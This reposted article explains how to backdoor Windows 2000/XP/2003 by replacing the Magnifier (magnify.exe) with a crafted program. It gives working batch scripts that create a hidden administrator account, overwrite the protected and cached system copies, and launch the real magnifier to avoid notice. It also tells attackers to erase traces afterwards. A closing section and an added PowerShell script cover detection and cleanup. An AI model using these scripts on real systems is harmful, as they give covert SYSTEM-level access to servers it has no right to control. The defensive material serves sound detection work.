Windows system backdoor instance 2

Source: Internet
Author: User

Magnifier: the trickiest backdoor

The Magnifier (magnify.exe) is a small accessibility tool bundled with Windows 2000/XP/2003 for users with visual impairment. It can be started from the logon screen, before anyone has signed in, through the Win+U key combination (which opens Utility Manager, from which Magnifier is launched). Because of this, an attacker can replace the magnifier program with a specially crafted file of the same name, magnify.exe, that gives control of the server.

Usually the attacker has the crafted magnify.exe create an administrator account and then logs on to the system with it. Sometimes the crafted program is instead made to launch a command prompt (cmd.exe) or the desktop shell (explorer.exe) directly. Note that any program launched this way runs with SYSTEM privileges, the highest on the machine. Because an administrator would notice if running the magnifier did something odd, the crafted program normally performs its work and then starts the genuine magnifier so that nothing looks wrong. The method is as follows:

1) Construct a batch script

 
 
  @echo off
  rem Create a hidden-style account (a trailing $ keeps the name out of "net user" listings)
  net user gslw$ test168 /add
  net localgroup administrators gslw$ /add
  rem Start the genuine magnifier, preserved as nagnify.exe in step 3, so the user sees nothing odd
  %Windir%\system32\nagnify.exe
  exit

(Figure 2)

2) File format conversion

Because magnify.bat has a .bat extension, it must be converted into an .exe of the same name before it can be launched through Win+U. The attacker can use WinRAR to build a self-extracting (SFX) .exe that runs the batch on extraction, or convert the file with the bat2com and com2exe tools. The following takes the latter as an example.

Open a command prompt, change to the directory holding bat2com and com2exe, and run "bat2com magnify.bat" to convert magnify.bat into magnify.com; then run "com2exe magnify.com" to convert magnify.com into magnify.exe. The batch file is now a program with the same name as the magnifier. (Figure 3)

3) Magnifier file replacement

The crafted magnify.exe must now be swapped in for the system file. Windows File Protection keeps a backup copy of protected system files in %Windir%\system32\dllcache and restores a changed file from that cache, so the copy in dllcache must be replaced first, and only then the live copy in %Windir%\system32. With the crafted magnify.exe placed in the %Windir% directory, the replacement can be done with a batch file:

 
 
  @echo off
  rem Preserve the genuine magnifier as nagnify.exe; the crafted magnify.exe runs it after its own work
  copy %Windir%\system32\dllcache\magnify.exe %Windir%\system32\nagnify.exe
  copy %Windir%\system32\magnify.exe %Windir%\system32\nagnify.exe
  rem Replace the Windows File Protection cache copy first, then the live copy in system32
  replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
  replace.exe %Windir%\magnify.exe %Windir%\system32
  exit

The batch first preserves the genuine magnifier as nagnify.exe, then overwrites both copies of magnify.exe with the crafted program of the same name. (Figure 4)

4) Exploitation

After these steps the magnifier backdoor is in place. The attacker then connects to the server over Remote Desktop, presses Win+U at the logon screen, and chooses Magnifier; at that moment the administrator account gslw$ is created on the server and the genuine magnifier opens. The attacker can then log on to the server with that account. Before disconnecting, the attacker will of course delete the account and all related traces so that the administrator does not discover it. (Figure 5)
 

5) Preventive measures

Check whether the icon of %Windir%\system32\magnify.exe is the original magnifier icon; if not, a magnifier backdoor may have been planted. Attackers sometimes give the file the same icon as the real program, so also compare the size and modification time of magnify.exe with those of the original; if either does not match, treat the file as suspicious.

You can also run magnify.exe and then open lusrmgr.msc to look for suspicious users (note that "net user" does not list account names ending in $, such as gslw$, so use the user manager or query the name directly with "net user gslw$"). If you confirm that the server has a magnifier backdoor, delete the file first and restore the genuine magnifier program. More thoroughly, replace the magnifier with a harmless, insignificant program, or turn the technique to your own advantage: build a magnify.exe of your own that warns off attackers, or that performs intrusion monitoring and evidence collection.
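The checks above can be scripted. The following is an added example, not code from the original article, written for PowerShell 2.0 or later on XP/2003 and run as Administrator. It records size, modification time and SHA-256 for the live magnify.exe and the dllcache copy, compares them with each other and, optionally, with a known-good copy you supply (the $KnownGood parameter is an assumption of this example, for instance a file expanded from the installation media's magnify.ex_), scans the binary for the traces the two packaging methods leave (the RAR marker of a WinRAR SFX, or the plaintext batch commands a bat2com/com2exe conversion embeds), and enumerates local accounts through ADSI so that $-suffixed names and Administrators members are not missed.

```powershell
# Added example: magnifier-backdoor checks for Windows XP/2003 (PowerShell 2.0+, run as Administrator).
# Not from the original article. $KnownGood is an assumed input: a clean magnify.exe from another
# machine or expanded from the install media (magnify.ex_); it is only used if you pass one.
param([string]$KnownGood)

$sys32 = Join-Path $env:windir 'system32\magnify.exe'
$cache = Join-Path $env:windir 'system32\dllcache\magnify.exe'

function Get-Sha256Hex([string]$Path) {
    # Get-FileHash only exists from PowerShell 4, so hash through .NET directly.
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs = [System.IO.File]::OpenRead($Path)
    try { ($sha.ComputeHash($fs) | ForEach-Object { $_.ToString('x2') }) -join '' }
    finally { $fs.Close() }
}

function Get-SuspiciousMarkers([string]$Path) {
    # Heuristics for the two packaging methods described in the article:
    # a WinRAR self-extracting archive carries the RAR marker bytes "Rar!\x1A\x07\x00";
    # a bat2com/com2exe conversion leaves the batch commands readable inside the .exe.
    $text = [System.Text.Encoding]::ASCII.GetString([System.IO.File]::ReadAllBytes($Path))
    $found = @()
    $rarMarker = 'Rar!' + [char]0x1A + [char]0x07 + [char]0x00
    if ($text.Contains($rarMarker)) { $found += 'RAR SFX marker' }
    foreach ($needle in @('@echo off', 'net user', 'net localgroup')) {
        if ($text.IndexOf($needle, [System.StringComparison]::OrdinalIgnoreCase) -ge 0) {
            $found += "embedded text '$needle'"
        }
    }
    return $found
}

# 1. File facts for the live copy and the WFP cache copy: size, mtime, hash, content markers.
$hashes = @{}
foreach ($p in @($sys32, $cache)) {
    if (-not (Test-Path $p)) { Write-Warning "$p is missing"; continue }
    $f = Get-Item $p
    $hashes[$p] = Get-Sha256Hex $p
    '{0}: {1} bytes, modified {2}, sha256 {3}' -f $p, $f.Length, $f.LastWriteTime, $hashes[$p]
    $m = @(Get-SuspiciousMarkers $p)
    if ($m.Count -gt 0) { Write-Warning ('{0} looks crafted: {1}' -f $p, ($m -join ', ')) }
}

# 2. The attack replaces dllcache first and then system32; a mismatch between the two,
#    or between either and a known-good copy, means at least one has been tampered with.
if ($hashes.Count -eq 2 -and $hashes[$sys32] -ne $hashes[$cache]) {
    Write-Warning 'system32 and dllcache copies of magnify.exe differ'
}
if ($KnownGood -and (Test-Path $KnownGood)) {
    $good = Get-Sha256Hex $KnownGood
    foreach ($p in @($hashes.Keys)) {
        if ($hashes[$p] -ne $good) { Write-Warning "$p does not match the known-good copy" }
    }
}

# 3. Accounts: "net user" hides names ending in $, so enumerate through ADSI instead
#    and list Administrators membership directly.
$computer = [ADSI]"WinNT://$env:COMPUTERNAME"
$computer.Children | Where-Object { $_.SchemaClassName -eq 'user' } | ForEach-Object {
    if ($_.Name -match '\$$') { Write-Warning ('account name ends in $: {0}' -f $_.Name) }
}
$admins = [ADSI]"WinNT://$env:COMPUTERNAME/Administrators,group"
'Members of Administrators:'
$admins.psbase.Invoke('Members') | ForEach-Object {
    '  ' + $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
}
```

A clean system shows identical hashes for both copies, no content markers and no $-suffixed accounts; any warning is a reason to restore magnify.exe from trusted media rather than from dllcache, since the attack overwrites the cache copy first.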

